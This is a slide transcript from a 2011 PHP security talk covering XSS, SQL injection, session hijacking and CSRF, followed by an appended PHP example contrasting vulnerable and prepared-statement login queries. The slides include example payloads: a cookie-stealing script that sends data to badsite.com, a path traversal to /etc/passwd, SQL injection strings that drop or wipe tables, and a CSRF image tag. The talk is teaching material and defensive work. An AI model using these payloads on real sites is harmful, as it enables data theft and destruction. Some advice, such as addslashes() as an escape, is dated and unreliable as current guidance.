
SydPHP Security in PHP

Security in PHP talk for SydPHP, Thursday 24th February, 2011


  1. Security and PHP
     February 2011
  2. Allan Shone
     Technical Yahoo!, Local Paranoid @Yahoo!7
     Been at Yahoo!7 just under 3 years
     allan.shone@yahoo.com
  3. Website Security
  4. What is Security?
     Why is Security important?
     What can you do about it?
  5. Types of issues
     XSS
     SQL Injection
     Session Hijacking
     CSRF
     Phishing
  6. Why XSS?
  7. Lead to larger problems
     Used to inject code into your site
     Bad people ™ can steal user information
  8. http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ealert%280%29;%3C/script%3E
     http://sydphp.leetbix.com/template.php?load=%3Cscript%3Edocument.location=%27http://badsite.com%27%3C/script%3E
     http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ea%3Ddocument.createElement(%22img%22)%3Ba.src%3D%22http%3A%2F%2Fbadsite.com%2F%3F%22%2Bdocument.cookie%3Bdocument.firstChild.appendChild(a)%3B%3C%2Fscript%3E
  9.
  10. http://sydphp.leetbix.com/template.php?load=/etc/passwd%00
      http://sydphp.leetbix.com/template.php?load=../some-config.conf%00
  11. POST too
  12. What do I do?!
  13. Filter
      Simplest solution: htmlentities()
  14. SQL what?
  15. Arbitrary SQL code being executed
      Bypass login, edit database content
      Find passwords, hidden information
  16. http://sydphp.leetbix.com/login.php
      Password: ' OR 1=1 -- '
      ' OR 1=1; DROP TABLE users; -- '
      ' OR 1=1; UPDATE TABLE users SET password='' WHERE 1=1; -- '
  17. Oh no!
  18. http://xkcd.com/327/
  19. escape
  20. mysql_real_escape_string()
      addslashes()
      PDO
      PDO::quote()
  21. Session hijacking
  22. Bad for users
      Bad for data integrity
      Easy to prevent
  23. Not stand-alone
  24. Cookies
  25. Integrity checking
  26. CSRF? Sugar?
  27. Cross-site request forgery
  28. Simple, but uncommon
  29. <img src="http://othersite.com/changepasswd?new=onlyIKnow" />
      <script>
      a=document.createElement('img');a.src='http://badsite../';document.firstChild.appendChild(a);
      a.src='http://badsite.com/otherpage';
      </script>
  30. Integrity, integrity
  31. Phishing!
  32. Same, but different?
  33. But what can you do
  34. PHP's filter functions
  35. filter_has_var
      filter_id
      filter_input_array
      filter_input
      filter_list
      filter_var_array
      filter_var
  36. No more SuperGlobals
  37. $search = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);
      echo "<h3>No results found for '{$search}'.</h3>";
      echo "<a href='?search=$search&page=2'>Next page</a>";
  38. INPUT_GET
      INPUT_POST
      INPUT_COOKIE
      INPUT_SERVER
      INPUT_ENV
  39. Twitter
      Allan Shone - @cerealboy
      Jared Mooring - @jadzor
      Filter function filters: http://au2.php.net/manual/en/filter.filters.php
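As an added example (not from the talk), the login check behind slides 16 and 20 written three ways: input concatenated into the query, escaped with PDO::quote(), and bound through a PDO prepared statement. It runs against an in-memory SQLite database so it needs no server; the pdo_sqlite extension, the users table and its single row are assumptions.

```php
<?php
// Added example, not from the SydPHP slides. Requires the pdo_sqlite extension.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// Constructed sample schema and row.
$db->exec("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)");
$db->exec("INSERT INTO users (username, password) VALUES ('alice', 'correct-horse')");

// 1. The problem from slide 16: user input pasted straight into the SQL text.
//    The slide's payload ' OR 1=1 -- ' turns the WHERE clause into a tautology
//    and comments out the trailing quote, so the query matches without a password.
function loginConcat(PDO $db, string $user, string $pass): bool
{
    $sql = "SELECT id FROM users WHERE username='$user' AND password='$pass'";
    return $db->query($sql)->fetch() !== false;
}

// 2. Slide 20, PDO::quote(): the quote inside the payload is escaped and the
//    value is wrapped in quotes, so it stays a string literal. This only holds
//    if every interpolated value is quoted; one forgotten call reopens the hole.
function loginQuote(PDO $db, string $user, string $pass): bool
{
    $sql = "SELECT id FROM users WHERE username=" . $db->quote($user)
         . " AND password=" . $db->quote($pass);
    return $db->query($sql)->fetch() !== false;
}

// 3. PDO prepared statement: the query text is fixed before any input is seen
//    and the values travel as parameters, so no escaping decision is left to
//    the developer. This is the form to reach for.
function loginPrepared(PDO $db, string $user, string $pass): bool
{
    $stmt = $db->prepare("SELECT id FROM users WHERE username = ? AND password = ?");
    $stmt->execute([$user, $pass]);
    return $stmt->fetch() !== false;
}

$payload = "' OR 1=1 -- '";   // the first payload from slide 16
var_dump(loginConcat($db, 'alice', $payload));
var_dump(loginQuote($db, 'alice', $payload));
var_dump(loginPrepared($db, 'alice', $payload));
var_dump(loginPrepared($db, 'alice', 'correct-horse'));
```

Only the concatenated version accepts the payload; the quoted and prepared versions treat it as a literal password and reject it, while the real password still succeeds.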
